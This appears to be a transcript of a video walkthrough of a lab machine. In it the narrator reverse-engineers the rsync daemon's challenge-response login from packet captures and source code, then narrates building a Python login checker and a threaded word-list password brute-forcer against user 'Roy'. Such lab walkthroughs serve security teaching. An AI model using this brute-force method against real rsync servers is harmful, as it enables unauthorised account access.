it's relatively fast. So first things first, we have to figure out how RSYNC works. So I'm going to open up Wireshark, and I'm going to capture a login request. So just go on ton 0, and then we're going to do rsync password is equal to support me on Patreon. And then we're going to do the IP address. So rsync rsync : / and then what was it? History grep list all. Do I not have it? rsync. We can grab this. So paste the IP and then 8730. And we have to specify a username. So we'll do Roy at. Okay. So this should log in. There we go. So we have a rsync thing, and if we did home Roy, we get a failure. Okay, that's what I expected to see. So I'm going to go to restart this real quick, and let's make sure we get a login failure. There we go. We will follow TCP stream. We can see what happens. We send it the rsync version. Server tells us its version. We send it the directory we want to access, and the server goes, hey, here's a blob. I don't know what that is. And then we say, hey, here's my username. Here's a blob. And server's like, cool, you failed to log in. Goodbye. So let's figure out exactly what this is. So echo-n base64-d, and it's just junk. And I guess we could do the other thing, but again, just junk. And this looks like, just based upon the flow, some type of challenge response. And it's done in order to prevent you from sending a plain text password over the wire. What happens is when you connect, the server gives you a challenge, and then your response needs to be that challenge and then your password, and then you hash it, and then you just send that hash back. So that's exactly how that works. It's challenge response, and we should figure out exactly how it's hashing it. So RSYNCD auth rec d login. And let's look at things. We got a post on Linux questions. Maybe someone's going to explain. This looks like it's talking about the configuration files. That's definitely not it. Kind of informal, and I may be wrong, but it helped my understanding. Let's check what you are. So if authentication is required, this is what happens, where challenge is a random string of base 64, and the user or the client must respond with user response, where user is the username they claim to be, so Roy, and response is the base 64 form of MD4 hash, the challenge plus the password. So let's do this. Let's go Python3. And then we can do, well, we should probably do something down here. CD code b stuff. Go here, and we'll just copy this piece of information so we have it. Paste. Cat stuff. There we go. So we need to put the challenge base 64 is equal to this. And I'm going to encode it because Python 3 likes everything in bytes. And then we know what the password was. So where is it? Here it is. Copy. And we'll do password is equal to this dot encode. I didn't do dot encode. So we got two variables, challenge base 64 and password. And now we have to do all the base 64. So from base 64, import B64 decode and B64 encode. So now we can do password B64 is equal to B64 encode password. And we can do challenge is equal to B64 decode chal B64. Incorrect padding. So I'm guessing it strips padding. So I'm just adding equals in base64. That is the padding. So we finally got it equaled. So now we have to create the hashes. So we'll import hashlib, and we'll do m is equal to hashlib.new md4. And then we can finally do m.update, and we'll do challenge plus password, and we can do m.hex digest and print the hash. So now if we b64 encode that, we have to do .encode. There we go. It's way too long. So because it's a hash, it should always be about this length in base64, and that's like double. And what's happening here is we probably want to just do digest. And the difference between hex digest and digest is simply just how it's represented. So if we do m.digest and m.hex digest, all hex digest is the hexadecimal form of this. So that's all it is. So if you do 1C, that'll probably be backslash. And 6.1 is probably X. Maybe, or something. But yeah. So let's do base64 encode m.digest. And that's still not what we're looking for. So we could change and try a bunch of brute forcing to try to get exactly how it's working, or we can just go and download the source code. So I'm going to do debian src rsync, and we're going to download the source code. Debian deb9, I want to say it was deb10, last .. nmap zetta.nmap. I didn't. We're going to say 10. I guess I accidentally erased that nmap doing something before, but I think that's Buster. So we'll do Buster and download Buster's source. They probably don't change all that much. So we got 313. We can save it. And let's see exactly how they do this. So make a new window, make dir src, move downloads rsync here, dir zxvf, rsync, go in, and let's find .grep auth, Authenticate.c, sounds great. And let's see. We can grep void on this and see all the functions. Base64 encode, generate challenge, generate hash, authenticate client. We probably want to do generate hash because in, challenge, out. So probably password, challenge, out. We don't really care how it's generating that random blob for the challenge. So let's look at gen hash. Generate hash. And we have generate MD4 hash created from the combination of the password and challenge string and return it base64. So some init, some update in, some update challenge. So it does two hashing functions. So let's change it that way. So we can do m is equal to new to reset our MD4, go back to update, and it did in first, which is the password, and then it did challenge. We just called it chow. There we go. And then B64 encode. And that's still not what we're looking for. We want it to say 4K. And it's saying WY. So let's go back to new. And we'll try password. And we'll give it the challenge base64. And we'll try this again. And that's still not what we're looking for. So we have to figure out exactly what's going on here. And just before it calls some update, it initializes it with some underscore init. So let's look at these functions where they're used. So grep -r to go through all files, I some underscore init. And we have checksum.c. So searching through sum init, we have int csum type and seed. So we did sum init -1 and either 0 or null. 0. So seed is 0 and csum type is -1. So sum init, if csum type is less than 0, then csum type is equal to per csum name, null, 0, and then we go into a bunch of cases. So let's look at parse csum name. Csum name, let's choice, here we go, here's the function, and we have if length and name, length, I don't know what that's doing, we gave it 0, I think. I forget what we gave it. Name, protocol version is equal to 30, then MD5. So I bet if we do some update, there's probably a case, yep, right here. So if it's MD5, then MD5 update, else go do this MD4 archaic stuff. And in Authenticate, despite the comment saying MD4, I'm betting this is MD5 because the protocol version, as Wireshark shows, is 31.0. So let's go and update our code. So we can do new MD5 update, and we'll do this one with password. And then we'll do this one with chal-b64. And finally, we can do the B64 encode of the hex digest. And not hex digest, of just the digest. And we don't want it to encode. And let's see. That did not get what we wanted. Why didn't you do this? M is equal to new hashlib MD5, m.update with password. Was I putting password in quotes before? No? Update password, m.update chal b64. B64 encode, m.digest. That is not equal to what I expect. Chal b64. A8 P. Oh. Chal b64 is equal to n. This. Because it strips the stupid equal signs. So that's where I had screwed up, probably. New MD5. Well, thankfully, it doesn't really matter because we had to do MD5 anyways, so we didn't waste too much time. M update password, and we can do chal b64. Dot encode. There we go. And we do the B64 encode, digest, there we go. So we know to be very careful with these stupid equal signs. We have to strip them out, but we got it. So now we can finally create rsync_login.py. So we do from base64, import B64 encode and B64 decode. And we'll do import hashlib, create a function for generate hash, and we'll do password and hash or challenge. There we go. And we'll do password equal to password.encode challenge. I'm guessing we'll be able to remove these eventually, but because we're just going to test this function out and leaving them there. And now m is equal to hashlib.new md4, great, and m.update password m.update challenge, and return. Nope, we'll just do md5 hash is equal to b64 encode m.digest, like that. And then we do md5 hash is equal to md5 hash dot replace, and we replace equals with nothing, and return md5 hash. And we can call strip on it as well to make sure it doesn't end with a line break for good measure. There we go. So now we should be able to print generate hash, and we'll give it the password, which I think was please support me on Patreon, and the challenge, which is this. And then hopefully the hard part is done. I don't know why my cursor went way up there. Python3 RSYNC login. Let's see. Line 14, 11, byte size. Okay. Right here, md5 hash equals md5 hash dot decode. Replace wants it to be a string, and because it's doing the basic SQL encode, it's a byte layer object. RSYNC support me on Patreon. There we go. So now we have its function to generate the hash. All we have to do is log into the server. So that module is just socket. So we'll do from socket import star. Now we can comment that out. ADDR info is equal to get ADDR info, the IP address, port 8730, AF INET6, and sock stream. We want to print ADDR info 0 to get everything. Okay. RSYNC. There we go. Let's copy the password. Or not password, the IP. And put it here. Okay. Python3 RSYNC login. Sock stream. It's underscore. Like that. There we go. So let's see. The first one is going to be family. That's a sock type. Next is protocol. Socket ADDR info AF INET6. Three. See, does this tell me? Probably do this. This may help. Family, type, protocol, address length, socket address, canon name. Okay, here it is. So AF, type, proto, canon name. That's what it is. So that blank is probably canon name. And then sock address. Because the rest of this is, I think that's a tuple. Okay. So we can make all those equal to this. Family, sock type, proto, canon name, sock ADR is equal to that. This is just how you initiate a socket, or how I do it. And then S is equal to socket, family, sock type, proto. S.receive, 4096, S.send, test, and we'll try this out. Endpoint not connected. S.connect. Sock address. There we go. Bytes like object, not string. Not used to Python 3. Sweet. So test is equal to this. Print test. What are you telling me, server? Okay. So it's sending at RSYNCD 31.0. So we want to send it that as well. So copy. And we will send this. So let's see what this looks like on the wire. So Wireshark, stop, start, continue out with saving, run, and we can follow TCP stream, and we sent it. We just didn't send the line break. So that's all we want to do now. So send. Is that going to parse it? I actually don't know what that's going to do. Restart Wireshark. Follow stream. There we go. That's what we want. So the next thing we wanted to send was, I think, home_Roy. So send that, receive, and then we'll send home Roy. I'm not Wiresharking. Follow stream. Okay, now we have this. And that's exactly what we want. So we almost got a login done. So now we do sReceive. Okay. And we'll do output is equal to this. Print output. Awesome. So we just got to grab this. So if I just split this, grab the third value, and then chop off the n. So we can do output, or we'll call this challenge is equal to output.split 3.strip. And we can print challenge. It's probably going to give me an error because of byte encoding. Split on space. And it's going to be like expected string, once byte. Yeah. Oh, bytes like object is required, not string. What? Dot encode. Oh. There we go. Out of range. Okay. 1, 2, 3. Oh, 2. Because it starts at 0. There we go. And now we just gotta strip off that n. So dot strip. There we go. So now we have a consistent challenge. So we can do def login. And we'll do everything hard-coded because we're lazy. So let's see. Address, socket, HomeRoy, challenge, and we will do dot decode because we want that in string because up here we encode it. So response is equal to generate hash, support, or do computer. Computer, which is his password, and challenge. s.send response \n. Okay, so now let's restart Wireshark and see if we get a login success. Oh, login. Let's see, bytes like object required, not string. Follow TCP, HomeRoy. So we never sent a password. Okay, now it works. Follow TCP stream. Auth failed. Why did auth fail? Oh, we need to send Roy space. Roy space. Okay, that looks promising. Follow TCP stream. RSYNCD, okay. So we'll say output is equal to this if in output return true, capital T, else return false. If login, print success, else print fail. Did I really screw up an if-then statement in Python? Oh, I see it. It's this one. There we go. Run it. Bytes like object here. I really got to find a better way to deal with this. There we go. Success. And if we do a different response, so we do, instead of computer, we'll do umputer, we get fail. So now we have a login checker for Python. Awesome. So the last piece, or the second program we have to do, is a way to get Python threading. So relatively simple. It's going to be much more simple than reversing that RSOC thing and RSYNC thing. And then finally, the final piece will be combining them, which is the simplest of them. So we started hard and we're going easy. So let's just vdemo.py. Then we'll just go over to a web browser and Google Python3 concurrent and go to the very first result. And we want to look at this example. But unfortunately, that text box is horribly formatted. Holy crap. Let's split cd code, the example.py, paste, set paste, paste. There we go. So that's the example on the right, and we'll do our coding on the left. So import concurrent.futures, and we're not going to do this with URLs, so we can get rid of those. And instead of load URL, we'll call that function later. With concurrent.futures.thread pool executor max workers equals 5. So this is the number of threads as executor. There we go. OCD. This will be the next step, the job. So we'll call this job is equal to executor.submit, and we have to create the function. And from time import sleep, from random import random. So what we're going to do, instead of grabbing a bunch of URLs, we're going to have 20 different threads. And each thread is going to get a random sleep between 0 seconds and 5 seconds, and then just end. So we'll be able to see all the threads spinning up and all the threads dying down. So that's going to be the goal of this. So def, we'll call this my thread, and the only argument we want to pass to it is thread ID. So we'll do sleep timeout is equal to rand int 0 to 5 print f start thread ID with sleep of sleep timeout. And then we'll sleep for the timeout, and then we'll return thread ID. So we're submitting the thread. So submit my thread, and then the argument you want to pass to it, so thread underscore ID, and then we have to create the range. So here it's doing the URLs, so we'll do thread ID for thread ID in range 0 to 20. So we'll just do 20 numbers. Okay. For future and concurrent futures as completed, and we called it job. So for every thread that's done, print f and thread and future.result. And that's going to grab the result. Like that. Sorry, I just hit the microphone if something came through. So I think that's all we need. So hopefully this code is simpler than that demo. And I didn't just complicate it. So if we do Python3 demo, of course, I can't code 14. I didn't do a parenthesis. Oh, not parenthesis, quote. There we go. So we can see we immediately started a bunch of threads, and now only starting threads as they die. So this is how we want to tackle a word list. So cat demo.py, or we can just copy this, copy demo.py to brute. We'll call it rsync brute.py. And then cat code rsync login. And let's start grabbing this. So we need these functions. Grab all this. Paste. Set paste. Okay. I'm just going up and hitting N to make sure I didn't copy a bunch of white space. Every now and then, like when I go in the clipboard and do what I'm doing, it treats this as white space and copies that. So that's all I was doing there. And login, and we'll have to give login a username and login a password. So login, let's see, turn true. We can just, here. For some reason, it did the white space here. So we can see bunches and bunches of white space. So let me recopy this. Copy. Set paste. Paste. Bunch of white space again. That's good. Here is not. Holy cow, what just happened there? There. It didn't even copy. It didn't even put a line break there. So delete all this, and we'll get out of. We'll copy it via tmux. That's how we'll do it. Highlight with space. Go to beginning. Enter. And we'll do Control B, paste. There we go. Now we're copied correctly. It's always an issue troubleshooting copy and paste commands. So my thread, we just need to put password here. Okay. And let's see. Is this tabs or spaces? Spaces. If future.result trying to think what to do here. We'll be really bad programmers and do nothing there. And we'll print everything here. So if this is true, print password. So, really bad program now. You should return it and do it properly, but my brain is getting fried from doing this video. Now we need to do Python to go through a file. Let's copy word list here. And let's see. For thread ID and open wordlist.text.readlines. Maybe. Let's see if this works. Execute or submit. This will be login, password, password, password. Python3 RSYNC brute.py. And of course, it doesn't work. Print output. So we're getting a few RSYNC OKs, which I think I know why. Because we're bad coders, and we should feel bad, but we're always setting it the password of computer. This needs to be password. And I'm probably going to get a stupid byte encoding error. Or not. Let's see. Let's control C it and cp word list to wordlist.back. And we'll put computer near the top. So we should return it pretty quickly. And we're not. My guess is we probably have a line break in password. V, what is it? RSYNC brute.py. And print password. Let's see what this is. Yep, we got a line break. So password equals password.strip. And it's still not working. I've expected it by then. Response. Challenge. So right here is what we want. Print password. So one of the threads did say computer. And the program's hung. Turns out threading is tough. I hate Python threading. I thought this would be simple. Let's see. Print password, print output. Let's see. Auth fail. Okay, we got one, but didn't seem to work. Print output. auth fail. Yep, so it's working actually. So if we get rid of this, there we go. So if we want to do this properly, let's see if we can real quick. If rsync and output, we can return password and else return false. If future dot result, or we can do maybe if not future dot result, print future dot result. That's still going to work. Maybe not. Let's see. Print future dot result. See how this is working. I really expected it to be done like 10 minutes ago. I have a bug somewhere. Turn password. Print output. Let's do that again so we can see everything. Auth fail, auth fail, auth fail, auth OK. So it's not even getting past to this. Let's see. Print test. I'm not sure why or what I screwed up. So let's see. For future and concurrent.futures is job completed, job, and job is defined here. Print end of job. Yeah, I'm not sure why that's happening. We set this to 50. Is it going to go exponentially faster? Yes. So I guess I'll leave this as a challenge for you to fix up this threading script. Looks like I bit off more than I can chew, but I mean, it was pretty cool up until it wasn't. Print password and exit or end. Die. I don't know how to kill Python. Python script terminate. How do I do this? Terminating a Python script. Control C. sys.exit. Sys.exit. Import sys. Is it going to exit even though it's in a thread? Of course not. So that's it for the video. I hope you guys enjoyed it and learned something. And maybe this is a humbling experience that sometimes it's just a pain to code. And you should take breaks, because I'm sure I'm going to take a break and then come back to this after I exercise or something, and it'll be super obvious what I was doing wrong. But at least, hey, it does work. We got proof. Take care, guys. See you all next week.